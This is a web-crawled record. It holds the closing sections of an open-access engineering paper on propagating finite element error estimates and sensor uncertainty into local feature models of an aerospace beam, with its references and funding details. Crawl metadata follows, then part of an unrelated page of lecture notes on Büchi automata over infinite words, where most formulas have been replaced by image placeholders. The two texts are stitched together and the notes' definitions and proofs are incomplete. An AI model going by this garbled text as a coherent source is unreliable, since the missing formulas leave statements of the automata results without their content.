diffuses into the stress field. This is believed to be due partially to the size of the feature. It is believed that if the edge was expanded, there would be a more localized field adjustment as opposed to the mixing/swirling affect seen in Fig. 10a.\n\nThe other main aspect of Fig. 10 is the error in the von Mises stress in Fig. 10b. One interesting aspect is that the maximum error is 3.4 MPa is nearly identical to the initial design. The location of this stress, however, is not solely located on the boundary. There is also an area of large error at the hole. One interesting aspect is the comparison between the stress concentration and the location of large error on the hole. There appears to be a rotation between these locations. This rotation seems to be about $$37.5^\\circ$$, while the exact rotation is difficult to measure due to the FE approximation.\n\nThe final analysis is the Monte Carlo simulation to show the robustness of this design to uncertainty. For the location of maximum stress, the $$95\\%$$ confidence interval found is $$295.3 \\pm 8.6$$ MPa. While the nominal stress is larger than for the initial design, the variance is nearly the same. To better understand how these two designs, have similar variances, the standard deviation field from this simulation is shown in Fig. 11. In general, this has the same features as the initial design, where the largest standard deviation is near the boundary with a maximum of 20.3 MPa compared to 20.7 MPa. However, one difference is that there is a local area of high error near the hole. This localization increases the variation in the confidence interval but is still small compared to the maximum. The fact that the initial design and the single hole design have similar variances is believed to be a trade-off between the Saint-Venant’s principle of being far away from the loading and the nature of the stress concentration.\n\n### Triple webbing holes design\n\nThe final design presented in this work is a modification of the single webbing hole. This replaces the single large hole with three 5 mm holes. The inclusion of a smaller hole is predicted to introduce a larger stress concentration, while using multiple holes is used to investigate interactions between the fields/stress concentrations created by these multiple holes. The nominal stress and error of the von Mises stress results from this analysis can be seen in Fig. 12.\n\nThe first aspect of Fig. 12a that is noticeable is the maximum von Mises stress. This feature has a maximum von Mises stress of 315.1 MPa that greatly exceeds the yield criterion. By looking at the webbing, the maximum stress occurs at the top of one of the holes. While not modelled in this simulation, this large stress is expected to be near the ultimate strength and cause a crack to form, resulting in a global failure compared to the local failure seen with the single hole design. If this design was presented to an analyst, it is expected that this design would be rejected. Despite this rejection, there is a large amount of information that can be gathered from this design.\n\nOne of the other aspects of interest in Fig. 12b is the interaction between the holes. The holes are 5 mm in diameter with the centres distanced 10 mm apart. In general, these holes did not affect each other. In the lowest hole, the same swirling field as the single hole (shown in “Single webbing hole design” Section) is present with the same predicted reason based on the feature size.\n\nThe error of the von Mises stress in Fig. 12b shows some interesting aspects. Firstly, the maximum error is smaller than the other designs, although by a small amount. The cause of this decrease is unknown but shows an interesting trend where the larger the stress concentration, the smaller the error concentration. Some future work is planned to identify if this trend is accurate for the method or only this specific model. The stress concentration is solely geometrically dependent while the error concentration is both geometric and numerically dependent since the error is based on the mesh and is described in terms of a GOEE. Additionally, the same rotation of the stress and error concentration as the single hole is seen.\n\nThe final results for this design are from the Monte Carlo simulation. For the location of maximum stress, the $$95\\%$$ confidence interval is $$319.0 \\, \\pm \\, 17.9$$ MPa. The interval has about double the spread compared to the other designs. This increase is especially interesting considering the standard deviation field shown in Fig. 13. For the entire design, the maximum standard deviation is 19.7 MPa compared to 20.7 MPa in the initial design. Despite this overall smaller variance, the maximum stress has a larger variance; this is due to the increased stress concentration in addition to the location being closer to the top edge.\n\n### Discussion\n\nThe results from all of these feature models show that the global model is well-defined and introduces very little error into the feature model. These results highlight several aspects; the first being that the total error is small compared to the nominal stress. This instructs the analyst that this modelling techniques is well defined for this loading, even at the stress concentration due to the holes. Another aspect is that the maximum error and the maximum stress do not necessarily coincide in physical space. For example in the initial design, the maximum stress occurs at the top of the webbing while the maximum error occurs near the intersection of the webbing and flange. While this is not a major issue, it is important to know since typical mesh refinement is performed at the stress concentration but might not be the location that has the largest stress value considering the effect of the error. An exact reason for this is currently unknown and is being studied, but the error does follow the expected pattern of being at the boundary of the feature model. The error measurement is based on the global mesh, so it follows logic that the error will be largest at locations that coincide with the global mesh.\n\nOne of the most interesting findings in this work is the differences between the feature designs that contain webbing holes. The initial design showed that the area of high stress was on the webbing. For designs that contain holes/stress concentrations in that region, the nominal stress increases to and past the von Mises yield criterion. Despite this increase in stress, the GOEE propagated into the feature model did not show many differences. The major difference is based on the GOEE field around the webbing holes. While the maximum error is nearly identical for the various designs, the single hole and triple holes have a GOEE concentration at the holes similar to the stress concentration. The one aspect that is different between the error and stress concentrations is that there is a rotation around the hole. It is difficult to specifically identify the rotation due to the FE resolution, but it appears to be approximately $$37.5^\\circ$$.\n\nThe other main finding is the comparison of the robustness of the various feature models. This is done with a Monte Carlo sampling of stochastic driving DoF. There are two major results from this simulation. The first is that the largest standard deviation of the feature model is located near the driven nodes. This showcases Saint-Venant’s principle that the farther away from the loading conditions, the smaller the effects of variation are upon the stress. The second result is the effect of the feature design on the $$95\\%$$ confidence interval at the location of maximum von Mises stress. While the initial design and the single hole have approximately the same confidence interval, this is contributed to by a few factors. The first factor is the location itself. For the initial design, the maximum location is on the top part of the webbing near the driven nodes, while the single hole design is located near the hole. With the location near the hole, there is a trade-off between the decrease due to the distance from the edge and the increase due to the stress concentration. This trade-off is dominated by the stress concentration for the triple hole feature design due to the small size of the holes, thus producing the largest confidence interval and the largest von Mises stress.\n\n## Conclusions\n\nThe work presented in this paper introduces a novel approach to propagate the uncertainty from the global model using a custom element formulation into the feature model by utilizing dual problems and multi-scale modelling. This provides information to the design engineer about the failure of complex areas without the need to perform large mesh refinements that are computationally non-feasible. To demonstrate this methodology, this work takes a simplified beam section and evaluates four local feature designs. The global model experiences near yielding stress via the von Mises criterion, while the initial design, which contains two holes in the flange section, does not experience any yielding. In addition to the stress, the error in the von Mises stress showed little error near the maximum stress with the location of maximum error near the intersection of the webbing and flange sections of the feature. Future planned work is to introduce a Bayesian response surface through a Gaussian process to reduce the total number of performed dual problems, thus reducing the computational evaluation time with little to no decrease in accuracy.\n\nIn addition to the initial local feature design, three additional designs are tested in order to determine the sensitivity of the multi-scale modelling procedure and the error propagation. One design makes a modification to the initial holes, while the other two add additional holes to the webbing section. The nominal hole modification did not show any difference in the stress distribution and error field compared to the initial design. This is mainly due to the applied loading since the elements do not have through thickness stiffness due to the thin shell assumption. To fully test this methodology, the other two features contain holes near the location of maximum stress. These holes increase the maximum stress to near and past the yielding criterion resulting in one feature having gross yielding suggesting a failed design if this system would be considered for an industrial case. In addition, confidence in these results is quantified via the error and show high confidence in these results.\n\nTo test the robustness of the multi-scale methodology, some variance is added to the driving nodes to represent the use of sensors in the analysis that introduce errors not accounted for using the GOEE (such as instrumentation error, manufacturing tolerances, etc.). Using this variability, the $$95\\%$$ confidence interval for the location of maximum von Mises stress via a Monte Carlo simulation and the standard deviation field are compared between the different feature designs. These results show that the variability decreases as the distance from the driven nodes increases, showcasing Saint-Venant’s principle. However, one aspect observed is that the greater the stress concentration, the larger the confidence interval despite not being located near the driven nodes where the largest variance is identified.\n\n## Availability of data and materials\n\nThe datasets used and/or analysed during the current study are available from the corresponding author on reasonable request.\n\n## References\n\n1. Oden JT, Prudhomme S. Estimation of modeling error in computational mechanics. Journal of Computational Mechanics. 2002;182:496–515.\n\n2. Ainsworth M, Oden JT. A posteriori error estimation in finite element analysis. Computer Methods in Applied Mechanics and Engineering. 1997;142(1):1–88.\n\n3. Grätsch T, Bathe K-J. A posteriori error estimation techniques in practical finite element analysis. Computers & Structures. 2005;83(4):235–65.\n\n4. Eriksson K, Johnson C. Adaptive finite element methods for parabolic problems i: A linear model problem. SIAM Journal on Numerical Analysis. 1991;28:43–77.\n\n5. Verfürth R. A posteriori error estimation and adaptive mesh-refinement techniques. Journal of Computational and Applied Mathematics. 1994;50(1):67–83.\n\n6. Bank JE, Weiser A. Some a posteriori error estimators for elliptic partial differential equations. Mathematics of Computation. 1985;44:283–301.\n\n7. Larsson F, Runesson K. On two-scale adaptive fe analysis of micro-heterogeneous media with seamless scale-bridging. Computer Methods in Applied Mechanics and Engineering. 2011;200(37):2662–74.\n\n8. Zhang J, Natarajan S, Ooi ET, Song C. Adaptive analysis using scaled boundary finite element method in 3d. Computer Methods in Applied Mechanics and Engineering. 2020;372:113374.\n\n9. Song C, Ooi ET, Pramod ALN, Natarajan S. A novel error indicator and an adaptive refinement technique using the scaled boundary finite element method. Engineering Analysis with Boundary Elements. 2018;94:10–24.\n\n10. Allendes A, Naranjo C, Otárola E. Stabilized finite element approximations for a generalized boussinesq problem: A posteriori error analysis. Computer Methods in Applied Mechanics and Engineering. 2020;361:112703.\n\n11. Bi C, Wang C, Lin Y. Two-grid finite element method and its a posteriori error estimates for a nonmonotone quasilinear elliptic problem under minimal regularity of data. Computers & Mathematics with Applications. 2018;76(1):98–112.\n\n12. Heltai L, Rotundo N. Error estimates in weighted sobolev norms for finite element immersed interface methods. Computers & Mathematics with Applications. 2019;78(11):3586–604.\n\n13. Rech M, Sauter S, Smolianski A. Two-scale composite finite element method for dirichlet problems on complicated domains. Numerische Mathematik. 2006;102:681–708.\n\n14. Pramanick T, Sinha RK. Error estimates for two-scale composite finite element approximations of parabolic equations with measure data in time for convex and nonconvex polygonal domains. Applied Numerical Mathematics. 2019;143:112–32.\n\n15. Cai Z, Kim S, Lee H-C. Error estimate of a finite element method using stress intensity factor. Computers & Mathematics with Applications. 2018;76(10):2402–8.\n\n16. Lin Z, Zhuang Z, You X, Wang H, Xu D. Enriched goal-oriented error estimation applied to fracture mechanics problems solved by xfem. Acta Mechanica Solida Sinica. 2012;25(4):393–403.\n\n17. Ainsworth M, Oden JT. A unified approach to a posteriori error estimation using element residual methods. Numerische Mathematik. 1993;65:23–50.\n\n18. Ladevèze P, Rougeot P, Blanchard P, Moreau JP. Local error estimators for finite element linear analysis. Computer Methods in Applied Mechanics and Engineering. 1999;176(1):231–46.\n\n19. Ferreira MAR, Lee H. Multiscale Modeling: A Bayesian Perspective. New York, USA: Springer; 2007.\n\n20. Weinan E. Principles of Multiscale Modeling. Cambridge, UK: Cambridge University Press; 2011.\n\n21. Guinard S, Bouclier R, Toniolli M, Passieux J-C. Multiscale analysis of complex aeronautical structures using robust non-intrusive coupling. Advanced Modeling and Simulation in Engineering Sciences. 2018;5:1–27.\n\n22. Said BE, Daghia F, Ivanov D, Hallett SR. An iterative multiscale modelling approach for nonlinear analysis of 3D composites. International Journal of Solids and Structures. 2018;132–133:42–58.\n\n23. Sturm R, Schatrow P, Klett Y. Multiscale modeling methods for analysis of failure modes in foldcore sandwich panels. Applied Composite Materials. 2015;22:857–68.\n\n24. Lua J, Gregory W, Sankar J. Multi-scale dynamic failure prediction tool for marine composite structures. Journal of Materials Science. 2006;41:6673–92.\n\n25. Addessi D, Sacco E. A multi-scale enriched model for the analysis of masonry panels. International Journal of Solids and Structures. 2012;49:865–80.\n\n26. Geers MGD, Kouznetsova VG, Matouš K, Yvonnet J. Homogenization methods and multiscale modeling: nonlinear problems. Encyclopedia of Computational Mechanics Second Edition, 2017; 1-34.\n\n27. Kim HJ, Swan CC. Voxel-based meshing and unit-cell analysis of textile composites. International Journal of Numerical Methods in Engineering. 2003;56:977–1006.\n\n28. Gendre L, Allix O, Gosselet P. A two-scale approximation of the schur complement and its use for non-intrusive coupling. International Journal for Numerical Methods in Engineering. 2011;87(9):889–905.\n\n29. Kerfriden P, Allix O, Gosselet P. A three-scale domain decomposition method for the 3D analysis of debonding in laminates. Computational Mechanics. 2009;44:343–62.\n\n30. Gosselet P, Rey C. Non-overlapping domain decomposition methods in structural mechanics. Archives of Computational Methods in Engineering. 2006;13:515–72.\n\n31. Zou X, Yan S, Rouse JP, Jones IA, Hamadi M, Fouinneteau M. A computationally efficient approach for analysing the onset of failure in aerospace composite structures. ICCM22, Melbourne, Australia 2019.\n\n32. Tirvaudey M, Chamoin L, Bouclier R, Passieux J-C. A posteriori error estimation and adaptivity in non-intrusive couplings between concurrent models. Computer Methods in Applied Mechanics and Engineering. 2020;367:113104.\n\n33. Paladim DA, Moitinho-de-Almeida JP, Bordas SPA, Kerfriden P. Guaranteed error bounds in homogenisation: an optimum stochastic approach to preserve the numerical separation of scales. International Journal for Numerical Methods in Engineering. 2017;110(2):103–32.\n\n34. Liang B, Zhang W, Fenner JS, Gao J, Shi Y, Zeng D, Su X, Liu WK, Cao J. Multi-scale modeling of mechanical behavior of cured woven textile composites accounting for the influence of yarn angle variation. Composites Part A: Applied Science and Manufacturing. 2019;124:105460.\n\n35. Shi B, Zhang M, Liu S, Sun B, Gu B. Multi-scale ageing mechanisms of 3D four directional and five directional braided composites’ impact fracture behaviors under thermo-oxidative environment. International Journal of Mechanical Sciences. 2019;155:50–65.\n\n36. Liu G, Zhang L, Guo L, Liao F, Zheng T, Zhong S. Multi-scale progressive failure simulation of 3D woven composites under uniaxial tension. Composite Structures. 2019;208:233–43.\n\n37. Chung ET, Leung WT, Pollock S. Goal-oriented adaptivity for gmsfem. Journal of Computational and Applied Mathematics. 2016;296:625–37.\n\n38. Chamoin L, Legoll F. Goal-oriented error estimation and adaptivity in msfem computations. arXiv preprint arXiv:1908.00367v1 2019.\n\n39. Zou X, Yan S, Rouse J, Matveev M, Li S, Jones IA, Hamadi M, Fouinneteau M. The identification of failure initiation hotspots in idealised composite material component models using a “bottom-up database” method. Proceedings of the 18th European Conference on Composite Materials 2018.\n\n40. Zou X, Yan S, Matveev M, Rouse JP, Jones IA, Hamadi M, Fouinneteau M. Comparison of interface modelling strategies for predicting delamination in composite l-angle sections under four-point bending. composite structures. Journal of Composite Structures 2019 Submitted.\n\n41. Bonney, M.S., Evans, R., Rouse, J., Jones, A., Hamadi, M.: Bayesian reconstruction of goal orientated error fields in large aerospace finite element models. In: Proceedings of the Aerospace Europe Conference 2020. 2020.\n\n42. Oden JT, Prudhomme S. Goal-oriented error estimation and adaptivity for the finite element method. Computers & Mathematics with Applications. 2001;41(5):735–56.\n\n43. Becker R, Rannacher R. An optimal control approach to a posteriori error estimation in finite element methods. Acta numerica. 2001;10(1):1–102.\n\n44. Andrés González Estrada O, Nadal E, Ródenas JJ, Kerfriden P, Pierre-Alain Bordas S, Fuenmayor FJ. Mesh adaptivity driven by goal-oriented locally equilibrated superconvergent patch recovery ; 2012, arXiv e-prints .\n\n45. Cirak F, Ramm E. A posteriori error estimation and adaptivity for linear elasticity using the reciprocal theorem. Computer Methods in Applied Mechanics and Engineering. 1998;156(1):351–62.\n\n46. Van der Zee K, Verhoosel C. Isogeometric analysis-based goal-oriented error estimation for free-boundary problems. Finite Elements in Analysis and Design. 2011;47(6):600–9.\n\n47. Larsson F, Hansbo P, Runesson K. Strategies for computing goal-oriented a posteriori error measures in non-linear elasticity. International Journal for Numerical Methods in Engineering. 2002;55(8):879–94.\n\n48. Grätsch T, Bathe K-J. A posteriori error estimation techniques in practical finite element analysis. Computers & structures. 2005;83(4–5):235–65.\n\n49. Ainsworth M, Zhu J, Craig A, Zienkiewicz O. Analysis of the zienkiewicz-zhu a-posteriori error estimator in the finite element method. International Journal for numerical methods in engineering. 1989;28(9):2161–74.\n\n50. Zhu J, Zienkiewicz O. Adaptive techniques in the finite element method. Communications in applied numerical methods. 1988;4(2):197–204.\n\n51. Zienkiewicz OC, Zhu JZ. A simple error estimator and adaptive procedure for practical engineering analysis. International journal for numerical methods in engineering. 1987;24(2):337–57.\n\n52. González-Estrada OA, Nadal E, Ródenas J, Kerfriden P, Bordas SP-A, Fuenmayor F. Mesh adaptivity driven by goal-oriented locally equilibrated superconvergent patch recovery. Computational Mechanics. 2014;53(5):957–76.\n\n53. ABAQUS/standard User’s Manual. Version 2019. United States: Dassault Systems Simulia Corporation; 2019.\n\n54. Dvorkin EN, Bathe K-J. A continuum mechanics based four-node shell element for general non-linear analysis. Engineering computations. 1984;1(1):77–88.\n\n55. Bathe K-J, Dvorkin EN. A formulation of general shell elements-the use of mixed interpolation of tensorial components. International journal for numerical methods in engineering. 1986;22(3):697–722.\n\n56. Oñate E. Structural Analysis with the Finite Element Method. Linear Statics: Volume 2: Beams, Plates and Shells. Springer, Barcelona, Spain 2013.\n\n57. Bathe K-J, Dvorkin EN. A four-node plate bending element based on mindlin/reissner plate theory and a mixed interpolation. International Journal for Numerical Methods in Engineering. 1985;21(2):367–83.\n\n58. Cook RD, Malkus DS, Plesha ME, Witt RJ. Concepts and Applications of Finite Element Analysis. 4th ed. New York, USA: Wiley; 2001.\n\n59. Ibrahimbegovic A, Taylor RL, Wilson EL. A robust quadrilateral membrane finite element with drilling degrees of freedom 1990.\n\n60. Knight NF, Rankin CC. Stags example problems manual. 2013.\n\n61. Ko Y, Lee P-S, Bathe K-J. The MITC4+ shell element and its performance. Computers and Structures. 2016;169:57–68.\n\n62. Jun H, Mukai P, Kim S. Benchmark tests of mitc triangular shell elements. Structural Engineering and Mechanics. 2018;68(1):17–38.\n\n63. MacNeal RH, Wilson CT, Harder RL, Hoff CC. The treatment of shell normals in finite element analysis. Finite elements in analysis and design. 1998;30(3):235–42.\n\n64. Zienkiewicz OC, R.L.T. The finite element method, fifth edition. Bautechnik. 2002; 79(2), 122-123.\n\n65. Huerta A, Díez P. Implicit residual type error estimators, 19–32. Springer; 2016.\n\n## Funding\n\nThis project is funded by the Clean Sky 2 Joint Undertaking under the European Union’s Horizon 2020 research and innovation program under grant agreement No 754581.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nJR and PK developed the methodology for the GOEE approach used in this work. RE implemented and developed the FE solution used to gather the additional information. MB implemented the full methodology, developed the test system, and drafting the paper. AJ and MH provided project guidance for MARQUESS. All authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to James Rouse.\n\n## Ethics declarations\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n### Publisher's Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Appendix A: MARQUESS\n\n### Appendix A: MARQUESS\n\nThe work presented in this paper is part of the Multi-scale Analysis of AiRframe Structures and Quantification of UncErtaintieS System (MARQUESS) project. MARQUESS is a collaborative work between the University of Nottingham and Airbus, funded through the Clean Sky 2 program. This is designed to be a plug-in for ABAQUS to analyse the multi-scale nature of aerospace components and identifying possible locations of failure. The method that MARQUESS uses to identify these locations is through a bottom-up (also known as feature modelling) and top-down approach . One of the main aspects of the MARQUESS workflow is the pre-computed sub-models. This uses a linear superposition of the unit deflection normalized desired results (such as stress components) at the boundary of the sub-model, then calculates various failure criteria such as delamination or yielding.\n\nWhile this work is part of the MARQUESS project, it does not use the plug-in. Despite this, the same procedure is used in a separate standalone program with a different failure criterion due to the current implementation. The pre-computed sub-model is generated manually using the exact same approach that is used for the plug-in. It is noted that the final version of the MARQUESS plug-in will incorporate the GOEE methodology used in this work.\n\n## Rights and permissions\n\nOpen Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.\n\nReprints and Permissions", null, "" ]
[ null, "https://amses-journal.springeropen.com/track/article/10.1186/s40323-021-00189-2", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89833385,"math_prob":0.96923846,"size":87856,"snap":"2022-40-2023-06","text_gpt3_token_len":18464,"char_repetition_ratio":0.17432728,"word_repetition_ratio":0.032649186,"special_character_ratio":0.20736204,"punctuation_ratio":0.109595045,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9915349,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-28T04:08:14Z\",\"WARC-Record-ID\":\"<urn:uuid:811237d3-3a65-4c17-a944-5abdd3985950>\",\"Content-Length\":\"451137\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3912944f-5618-4c40-a072-2277e719f52f>\",\"WARC-Concurrent-To\":\"<urn:uuid:92749669-2618-484b-b6ea-d09daa3ec65a>\",\"WARC-IP-Address\":\"146.75.36.95\",\"WARC-Target-URI\":\"https://amses-journal.springeropen.com/articles/10.1186/s40323-021-00189-2\",\"WARC-Payload-Digest\":\"sha1:WR6DXRROWAXLKOYDKB4RIOT346IWZA5D\",\"WARC-Block-Digest\":\"sha1:JCOOTMMJTUQJZ6DQM45D6TPCZB72QOUT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335059.43_warc_CC-MAIN-20220928020513-20220928050513-00524.warc.gz\"}"}
https://www.mimuw.edu.pl/~bojan/20142015-2/alg/6-buchi-automata
[ "Mikołaj Bojańczyk\n\n## 6. Büchi automata\n\nAn", null, "-word is a word where positions are indexed by natural numbers. We write", null, "for the set of", null, "-words over an alphabet", null, ". To recognise languages of", null, "-words, we use Büchi automata (we will later move a monoid style).\n\nBüchi automata. A nondeterministic Büchi automaton has the same syntax as a nondeterministic automaton over finite words (say, without", null, "-transitions), i.e. it is a tuple", null, "where", null, "consisting of  states, the input alphabet, initial states, final states, and transitions. Such an automaton accepts an", null, "-word if it admits some run which begins in an intial state and visits final states infinitely often. Call a language", null, "-regular if it is recognised by some nondeterministic Büchi automaton.\n\nExample. The obvious question is: what about deterministic Büchi automataAs it turns out, these are too weak. Indeed, consider the set of", null, "-words over alphabet", null, "where the letter", null, "appears finitely often, this set can be described by the expression", null, ". Here is a picture of a nondeterministic Büchi automaton that recognises this language:\n\nWe claim that no deterministic Büchi automaton recognises this language. Suppose that there would be such an automaton. Run this automaton on the word", null, ". Since this word contains finitely many", null, "‘s, it should be accepted, and therefore an accepting state should be used after reading some finite prefix", null, ". Consider now the word", null, ". Again this word should be accepted, and therefore there should be some", null, "such that an accepting state is seen after reading", null, ". Iterating this construction, we get an", null, "-word of the form", null, "such that the automaton visits an accepting state before every", null, ", and therefore accepts, despite the word having infinitely many", null, "‘s. Note how we crucially used determinism – by assuming that changing a suffix of the word does not change the run on a prefix.", null, "The automaton monoid and linked pairs\n\nOur goal is to prove that nondeterministic Büchi automata are closed under complementation, and then a form determinisation: namely nondeterministic Büchi automata are equivalent to Boolean combinations of deterministic Büchi automata. Before proving these results, we show how to associate to each nondeterministic Büchi automaton a monoid homomorphism.\n\nThe automaton homomorphism. Consider a nondeterministic Büchi automaton with states", null, ". For a finite run", null, "(i.e. a finite sequence of transitions), define the profile of the run to be the triple in", null, "such that the first coordinate is the source state, the last coordinate is the target state, and the middle coordinate says whether or not the run contains an accepting state (1 means yes). For a finite input word", null, ", define it profile", null, "to be the set of all profiles of finite runs over this word. It is not difficult to see that the profile function", null, "is compositional, and  therefore its image, call it", null, ", can be equipped with a monoid structure so that", null, "becomes a monoid homomorphism. This monoid homomorphism is called the automaton homomorphism associated to the automaton.\n\nLinked pairs and factorisations. Define a linked pair in the monoid", null, "to be a pair of elements", null, "such that", null, "and", null, ". This notion makes sense in any monoid, but the following notion of accepting linked pair is specific to the monoid defined above. Define a linked pair to be accepting if there are some states", null, "such that", null, "is initial and  the elements", null, ", when seen as sets of triples, satisfy", null, "If a linked pair is not accepting, then it is called rejecting.\n\nFor", null, "and", null, ", define an", null, "-factorisation of", null, "to be a factorisation", null, "into nonempty words such that", null, "and", null, "Note that the existence of such a factorisation implies that", null, "is a linked pair.\n\nBüchi Linked Pair Lemma. A word", null, "is rejected if and only if it admits an", null, "-factorisation for some rejecting linked pair", null, ".\n\nProof. Suppose that", null, "is rejected. Apply the Ramsey theorem, yielding some", null, "-factorisation for some linked pair. Clearly this pair must be rejecting, since otherwise we could construct an accepting run for", null, ". For the converse implication, suppose that", null, "admits an", null, "-factorisation, say", null, "for some rejecting linked pair. Define", null, "to be the position at the beginning of the word", null, ", in particular", null, "is the first position. We claim that there cannot be any accepting run on", null, ". Toward a contradiction, suppose that", null, "does admit an accepting run, call it", null, ". If", null, "is accepting, then by the pigeonhole principle one can find some", null, "such that accepting states are seen between", null, "and", null, ", and the same state, call it", null, ", is seen in positions", null, "and", null, ". This means that there is some initial state", null, "that the word", null, "admits a run of profile", null, ". In other words, we have", null, "By the same kind of reasoning, we conclude that", null, "and therefore the linked pair", null, "is accepting, contradicting our assumption.", null, "Complementation of Büchi automata\n\nAs an application of the automaton homomorphism, we prove that languages recognised by nondeterministic Büchi automata are closed under complementation. This is Büchi’s original proof of the result. We will also use the same ideas to prove determinisation, which is done here.\n\nTheorem. For every nondeterministic Büchi automaton, the complement of its language is recognised by a nondeterministic Büchi automaton.\n\nProof. Consider a language", null, "recognised by a nondeterministic Büchi automaton, and let", null, "be the automaton homomorphism corresponding to this automaton. By the Büchi Linked Pair Lemma, the complement of", null, "is equal to", null, "with the union ranging over rejecting linked pairs. The above language is easily seen to be recognised by a nondeterministic Büchi automaton.", null, "" ]
[ null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-6c285ba5dcf7832925728bba872dc381_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-aeb6fee794feaade92eebde4e9865fd9_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-092c5053fced592accc10801fcb1e701_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fdc4e0612c3b95e19977d73326ec2af5_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-bed8547872890507f19a89d0b85aac65_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-1a1b7f105cb5c92c5babd46ba3e079fe_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b9876851baf92019e82e43590932dc73_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-64af190b597d3bcf4a24f44dfd47cf84_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-1a2c7f9fc1bd4770873f1d8625ba1163_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b9876851baf92019e82e43590932dc73_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b15570da921b675e2b0daa42668dc9a7_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-bfd6407a2f93ade31bf7abdbcce75c79_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b896687a25f0abe32bed92c61a309494_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-f6abf19318db07e8a9ab95ea61f8648c_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fd88311a96936352f6e78a3e0a06c929_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-a8704a9844086c4400b2bb1088be7e89_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b9876851baf92019e82e43590932dc73_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b9876851baf92019e82e43590932dc73_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b06cee67d5b1a769f0a344ace98d5692_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-bed8547872890507f19a89d0b85aac65_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-6111f45e401c8d649a5583394ced1491_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-78432c639ac6d2364086ce34e6deff41_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-562e8e0a862a7d0e9dd2c4f8f405844a_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-0743bf01b57d870916f5ddcf29ffbf38_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-60f817b38fe1ea150775070c85afb9ae_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-361fcbd59862666c6a4178483821b904_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-38fa76124c4eb76045dba8c493133b06_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-361fcbd59862666c6a4178483821b904_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-2a3081c239e53896dcf27cea7f35b11b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-840b8f18983169c18419facd706feaf6_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-c07ed52f8c1c31e32cf1919d087b2988_l3.png", null, 